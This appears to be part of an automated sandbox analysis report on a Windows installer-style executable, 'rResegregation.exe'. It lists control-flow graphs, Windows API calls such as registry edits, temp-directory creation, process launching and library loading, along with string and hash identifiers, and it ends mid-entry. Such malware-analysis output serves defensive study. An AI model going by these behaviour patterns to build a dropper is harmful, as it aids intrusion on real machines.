                                                                  Control-flow Graph

                                                                  control_flow_graph 621 404f25-404f3a 622 404ff0-404ff4 621->622 623 404f40-404f52 621->623 624 404f54-404f58 call 405d2e 623->624 625 404f5d-404f69 lstrlenA 623->625 624->625 627 404f86-404f8a 625->627 628 404f6b-404f7b lstrlenA 625->628 630 404f99-404f9d 627->630 631 404f8c-404f93 SetWindowTextA 627->631 628->622 629 404f7d-404f81 lstrcatA 628->629 629->627 632 404fe3-404fe5 630->632 633 404f9f-404fe1 SendMessageA * 3 630->633 631->630 632->622 634 404fe7-404fea 632->634 633->632 634->622
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,00000000,0078FCF8,764823A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000,?), ref: 00404F5E
                                                                  • lstrlenA.KERNEL32(00402FD7,Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,00000000,0078FCF8,764823A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000), ref: 00404F6E
                                                                  • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,00402FD7,00402FD7,Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,00000000,0078FCF8,764823A0), ref: 00404F81
                                                                  • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll), ref: 00404F93
                                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FB9
                                                                  • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FD3
                                                                  • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FE1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                  • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll
                                                                  • API String ID: 2531174081-1640484927
                                                                  • Opcode ID: ffeeb4340939991043f1e35409b025ff27b4b0c44884115af8641db84ff7770b
                                                                  • Instruction ID: b1dc6bec94ba42b715134808c0c3c35089c42976f802e7ea77bea70e7b84fba8
                                                                  • Opcode Fuzzy Hash: ffeeb4340939991043f1e35409b025ff27b4b0c44884115af8641db84ff7770b
                                                                  • Instruction Fuzzy Hash: 1F21817190011DBFDF119FA5DD449DEBFA9EF45354F04807AFA04A6291C7388E409BA8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  control_flow_graph 635 4053eb-405436 CreateDirectoryA 636 405438-40543a 635->636 637 40543c-405449 GetLastError 635->637 638 405463-405465 636->638 637->638 639 40544b-40545f SetFileSecurityA 637->639 639->636 640 405461 GetLastError 639->640 640->638
                                                                  APIs
                                                                  • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040542E
                                                                  • GetLastError.KERNEL32 ref: 00405442
                                                                  • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405457
                                                                  • GetLastError.KERNEL32 ref: 00405461
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
                                                                  • API String ID: 3449924974-2230009264
                                                                  • Opcode ID: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                                  • Instruction ID: 8acfd36fb30660db29d177a8be8d7647adb8d58efdd4f3c758bfd1505ce0b010
                                                                  • Opcode Fuzzy Hash: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                                  • Instruction Fuzzy Hash: CF010871D14259EADF119FA4D9447EFBFB8EF04315F004176E904B6290D378A644CFAA
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  control_flow_graph 641 406037-406057 GetSystemDirectoryA 642 406059 641->642 643 40605b-40605d 641->643 642->643 644 40606d-40606f 643->644 645 40605f-406067 643->645 647 406070-4060a2 wsprintfA LoadLibraryExA 644->647 645->644 646 406069-40606b 645->646 646->647
                                                                  APIs
                                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040604E
                                                                  • wsprintfA.USER32 ref: 00406087
                                                                  • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040609B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                  • String ID: %s%s.dll$UXTHEME$\
                                                                  • API String ID: 2200240437-4240819195
                                                                  • Opcode ID: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                                  • Instruction ID: 17439860729f5247506b6fa79cc71e4dc0dc9fec6db89644704a68070b9bc3a3
                                                                  • Opcode Fuzzy Hash: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                                  • Instruction Fuzzy Hash: BAF0F630A40209ABEB14EB78DC0DFEB365CAB08305F14017AB547F11D2EA78E8258B69
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  control_flow_graph 648 402e9f-402eb3 649 402eb5 648->649 650 402ebc-402ec5 648->650 649->650 651 402ec7 650->651 652 402ece-402ed3 650->652 651->652 653 402ee3-402ef0 call 40308e 652->653 654 402ed5-402ede call 4030a4 652->654 658 402ef6-402efa 653->658 659 40307c 653->659 654->653 660 402f00-402f26 GetTickCount 658->660 661 403027-403029 658->661 662 40307e-40307f 659->662 665 403084 660->665 666 402f2c-402f34 660->666 663 403069-40306c 661->663 664 40302b-40302e 661->664 667 403087-40308b 662->667 668 403071-40307a call 40308e 663->668 669 40306e 663->669 664->665 670 403030 664->670 665->667 671 402f36 666->671 672 402f39-402f47 call 40308e 666->672 668->659 681 403081 668->681 669->668 674 403033-403039 670->674 671->672 672->659 680 402f4d-402f56 672->680 677 40303b 674->677 678 40303d-40304b call 40308e 674->678 677->678 678->659 686 40304d-403059 call 405a26 678->686 683 402f5c-402f7c call 406188 680->683 681->665 690 402f82-402f95 GetTickCount 683->690 691 40301f-403021 683->691 692 403023-403025 686->692 693 40305b-403065 686->693 694 402f97-402f9f 690->694 695 402fda-402fdc 690->695 691->662 692->662 693->674 696 403067 693->696 697 402fa1-402fa5 694->697 698 402fa7-402fd2 MulDiv wsprintfA call 404f25 694->698 699 403013-403017 695->699 700 402fde-402fe2 695->700 696->665 697->695 697->698 706 402fd7 698->706 699->666 701 40301d 699->701 703 402fe4-402feb call 405a26 700->703 704 402ff9-403004 700->704 701->665 709 402ff0-402ff2 703->709 705 403007-40300b 704->705 705->683 708 403011 705->708 706->695 708->665 709->692 710 402ff4-402ff7 709->710 710->705
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: CountTick$wsprintf
                                                                  • String ID: ... %d%%
                                                                  • API String ID: 551687249-2449383134
                                                                  • Opcode ID: 64d2ce798d2dc69bad610a2ea0e87ea1e6662520605f5bed10a59724df5d2c56
                                                                  • Instruction ID: 2f6adf6c827ed57ff932280c4bcb171559557b12de80228d6f8143075edc11b6
                                                                  • Opcode Fuzzy Hash: 64d2ce798d2dc69bad610a2ea0e87ea1e6662520605f5bed10a59724df5d2c56
                                                                  • Instruction Fuzzy Hash: 5D519E7280221AABDB10DF65DA44A9F7BB8AF00755F14417BFD10B32C4C7788E51DBAA
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  control_flow_graph 711 402364-4023aa call 402b2f call 402a3a * 2 RegCreateKeyExA 718 4023b0-4023b8 711->718 719 4028cf-4028de 711->719 721 4023c8-4023cb 718->721 722 4023ba-4023c7 call 402a3a lstrlenA 718->722 725 4023db-4023de 721->725 726 4023cd-4023da call 402a1d 721->726 722->721 727 4023e0-4023ea call 402e9f 725->727 728 4023ef-402403 RegSetValueExA 725->728 726->725 727->728 733 402405 728->733 734 402408-4024de RegCloseKey 728->734 733->734 734->719 736 4026a6-4026ad 734->736 736->719
                                                                  APIs
                                                                  • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023A2
                                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsoF4B.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023C2
                                                                  • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsoF4B.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023FB
                                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsoF4B.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004024D8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateValuelstrlen
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp
                                                                  • API String ID: 1356686001-4010544561
                                                                  • Opcode ID: b012daf43883be94562b48873df64982ee1afc678edabc89ed89c70fe9f2269d
                                                                  • Instruction ID: 90de9cbbb944b5ce7c16acb051fe3e73370ea29dc9d439d86f68b9f38bc34e97
                                                                  • Opcode Fuzzy Hash: b012daf43883be94562b48873df64982ee1afc678edabc89ed89c70fe9f2269d
                                                                  • Instruction Fuzzy Hash: 04117572E00108BFEB10AFA4EE89EAF767DEB54358F10403AF505B61D1D6B85D419B28
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  control_flow_graph 737 4059ae-4059b8 738 4059b9-4059e4 GetTickCount GetTempFileNameA 737->738 739 4059f3-4059f5 738->739 740 4059e6-4059e8 738->740 742 4059ed-4059f0 739->742 740->738 741 4059ea 740->741 741->742
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 004059C2
                                                                  • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004059DC
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004059B1
                                                                  • nsa, xrefs: 004059B9
                                                                  • "C:\Users\user\Desktop\rResegregation.exe", xrefs: 004059AE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: CountFileNameTempTick
                                                                  • String ID: "C:\Users\user\Desktop\rResegregation.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                  • API String ID: 1716503409-3306602917
                                                                  • Opcode ID: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                  • Instruction ID: 14833181556f01f8699e9ecebe408800633a5ab51cc0013a882439dab00eebba
                                                                  • Opcode Fuzzy Hash: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                  • Instruction Fuzzy Hash: 2AF0E232708204ABEB109F15EC04B9B7B9CDF91720F00C03BFA049A181D2B598448B58
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  control_flow_graph 743 402a7a-402aa3 RegOpenKeyExA 744 402aa5-402ab0 743->744 745 402b0e-402b12 743->745 746 402acb-402adb RegEnumKeyA 744->746 747 402ab2-402ab5 746->747 748 402add-402aef RegCloseKey call 4060a5 746->748 749 402b02-402b05 RegCloseKey 747->749 750 402ab7-402ac9 call 402a7a 747->750 755 402af1-402b00 748->755 756 402b15-402b1b 748->756 752 402b0b-402b0d 749->752 750->746 750->748 752->745 755->745 756->752 758 402b1d-402b2b RegDeleteKeyA 756->758 758->752 760 402b2d 758->760 760->745
                                                                  APIs
                                                                  • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000000,?), ref: 00402A9B
                                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402AE0
                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402B05
                                                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: Close$DeleteEnumOpen
                                                                  • String ID:
                                                                  • API String ID: 1912718029-0
                                                                  • Opcode ID: b56f379d4c7718a716cd2f0f4935c5eaa8b38fc1cc2d991abe85072f08e57da9
                                                                  • Instruction ID: 557db050c0314b8bb5c0b22d2db4fc3530b60cfc711b7b252a141f8c1691c263
                                                                  • Opcode Fuzzy Hash: b56f379d4c7718a716cd2f0f4935c5eaa8b38fc1cc2d991abe85072f08e57da9
                                                                  • Instruction Fuzzy Hash: 82114272900109FFEF229F50DE89DAE3B7DEB54344B104436F901B10A0D7B59E51DB69
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC4
                                                                    • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC9
                                                                    • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                  • GlobalFree.KERNEL32(00000000), ref: 10001768
                                                                  • FreeLibrary.KERNEL32(?), ref: 100017DF
                                                                  • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                    • Part of subcall function 100021B0: GlobalAlloc.KERNEL32(00000040,7D8BEC45), ref: 100021E2
                                                                    • Part of subcall function 10002589: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001739,00000000), ref: 100025FB
                                                                    • Part of subcall function 10001559: lstrcpyA.KERNEL32(00000000,10004010,00000000,10001695,00000000), ref: 10001572
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28770977477.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                  • Associated: 00000000.00000002.28770951337.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000000.00000002.28771003199.0000000010003000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000000.00000002.28771028957.0000000010005000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_10000000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                  • String ID:
                                                                  • API String ID: 1791698881-3916222277
                                                                  • Opcode ID: 676a92eb632660267f66b66a0e8313324764f953d5bc12d8e45a65eb3bf091b8
                                                                  • Instruction ID: 7bd52774c71d274dd6e07030a7ef65efb9a892d3f5f2eddd47f658e3267813e4
                                                                  • Opcode Fuzzy Hash: 676a92eb632660267f66b66a0e8313324764f953d5bc12d8e45a65eb3bf091b8
                                                                  • Instruction Fuzzy Hash: B5319C79408205DAFB41DF649CC5BCA37ECFF042D5F018465FA0A9A09EDF78A8858B60
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401FBB
                                                                    • Part of subcall function 00404F25: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,00000000,0078FCF8,764823A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000,?), ref: 00404F5E
                                                                    • Part of subcall function 00404F25: lstrlenA.KERNEL32(00402FD7,Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,00000000,0078FCF8,764823A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000), ref: 00404F6E
                                                                    • Part of subcall function 00404F25: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,00402FD7,00402FD7,Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,00000000,0078FCF8,764823A0), ref: 00404F81
                                                                    • Part of subcall function 00404F25: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll), ref: 00404F93
                                                                    • Part of subcall function 00404F25: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FB9
                                                                    • Part of subcall function 00404F25: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FD3
                                                                    • Part of subcall function 00404F25: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FE1
                                                                  • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FCB
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
                                                                  • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402045
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                  • String ID:
                                                                  • API String ID: 2987980305-0
                                                                  • Opcode ID: 05c8e021a7a7f73ce592bb1d623faec27b59f04a76483d1fd0bf651fb880023d
                                                                  • Instruction ID: a6d6138a22214a2ec3127db012fcbe8ccdb9873b287714200ab65a7954d0c462
                                                                  • Opcode Fuzzy Hash: 05c8e021a7a7f73ce592bb1d623faec27b59f04a76483d1fd0bf651fb880023d
                                                                  • Instruction Fuzzy Hash: 93212B72904211EBDF217F648E4DAAE76B1AB45318F30423BF311B62D1C7BC4941DA6E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00405817: CharNextA.USER32(?,?,Mundstykket.min,?,00405883,Mundstykket.min,Mundstykket.min,76483410,?,C:\Users\user\AppData\Local\Temp\,004055CE,?,76483410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405825
                                                                    • Part of subcall function 00405817: CharNextA.USER32(00000000), ref: 0040582A
                                                                    • Part of subcall function 00405817: CharNextA.USER32(00000000), ref: 0040583E
                                                                  • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                                    • Part of subcall function 004053EB: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040542E
                                                                  • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet\brummedes\janthinidae\Uhyre,00000000,00000000,000000F0), ref: 00401634
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet\brummedes\janthinidae\Uhyre, xrefs: 00401629
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet\brummedes\janthinidae\Uhyre
                                                                  • API String ID: 1892508949-2936765130
                                                                  • Opcode ID: 73aee729b28fb73f9d8e4b10f4e7109390eb8d9f0c8663a15968dc92b5e27352
                                                                  • Instruction ID: 6ea9d176647784ede47dca84986b1d8040ea6f7a989068fde2debc666839409d
                                                                  • Opcode Fuzzy Hash: 73aee729b28fb73f9d8e4b10f4e7109390eb8d9f0c8663a15968dc92b5e27352
                                                                  • Instruction Fuzzy Hash: A2112B35404141ABDF217B650C405BF27F0EA92315738463FF591B22E2C63C0942A63F
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0079FD48,Error launching installer), ref: 004054C6
                                                                  • CloseHandle.KERNEL32(?), ref: 004054D3
                                                                  Strings
                                                                  • Error launching installer, xrefs: 004054B0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateHandleProcess
                                                                  • String ID: Error launching installer
                                                                  • API String ID: 3712363035-66219284
                                                                  • Opcode ID: 9f0b0f85f0295080a22e5d155a7c66e390f8f607a8e504552004f12f3aafe87f
                                                                  • Instruction ID: 542db3fa263e6c3fd8363e81c561fcb1d1edc85eb607383f0aa2fc0e1be44d1e
                                                                  • Opcode Fuzzy Hash: 9f0b0f85f0295080a22e5d155a7c66e390f8f607a8e504552004f12f3aafe87f
                                                                  • Instruction Fuzzy Hash: 95E0BFF4A002097FEB10AB64ED45F7B7BACEB00645F108561FD10F6190D674A9549A79
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00404F25: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,00000000,0078FCF8,764823A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000,?), ref: 00404F5E
                                                                    • Part of subcall function 00404F25: lstrlenA.KERNEL32(00402FD7,Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,00000000,0078FCF8,764823A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000), ref: 00404F6E
                                                                    • Part of subcall function 00404F25: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,00402FD7,00402FD7,Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,00000000,0078FCF8,764823A0), ref: 00404F81
                                                                    • Part of subcall function 00404F25: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll), ref: 00404F93
                                                                    • Part of subcall function 00404F25: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FB9
                                                                    • Part of subcall function 00404F25: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FD3
                                                                    • Part of subcall function 00404F25: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FE1
                                                                    • Part of subcall function 0040549D: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0079FD48,Error launching installer), ref: 004054C6
                                                                    • Part of subcall function 0040549D: CloseHandle.KERNEL32(?), ref: 004054D3
                                                                  • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E7E
                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00401E8E
                                                                  • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EB3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                                                  • String ID:
                                                                  • API String ID: 3521207402-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,0000057B,00000000,00000022,00000000,?,?,?,00402314,00000002), ref: 00402B6C
                                                                  • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024B0
                                                                  • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003,00020019), ref: 004024C3
                                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsoF4B.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004024D8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: Enum$CloseOpenValue
                                                                  • String ID:
                                                                  • API String ID: 167947723-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28770977477.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_10000000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: EnumErrorLastWindows
                                                                  • String ID:
                                                                  • API String ID: 14984897-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,0000057B,00000000,00000022,00000000,?,?,?,00402314,00000002), ref: 00402B6C
                                                                  • RegQueryValueExA.KERNELBASE(00000000,00000000,?,?,?,?), ref: 00402440
                                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsoF4B.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004024D8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpenQueryValue
                                                                  • String ID:
                                                                  • API String ID: 3677997916-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                  • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,0000057B,00000000,00000022,00000000,?,?,?,00402314,00000002), ref: 00402B6C
                                                                  • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033,00000002), ref: 00402327
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00402330
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: CloseDeleteOpenValue
                                                                  • String ID:
                                                                  • API String ID: 849931509-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • ShowWindow.USER32(000103CC), ref: 00401579
                                                                  • ShowWindow.USER32(000103C6), ref: 0040158E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
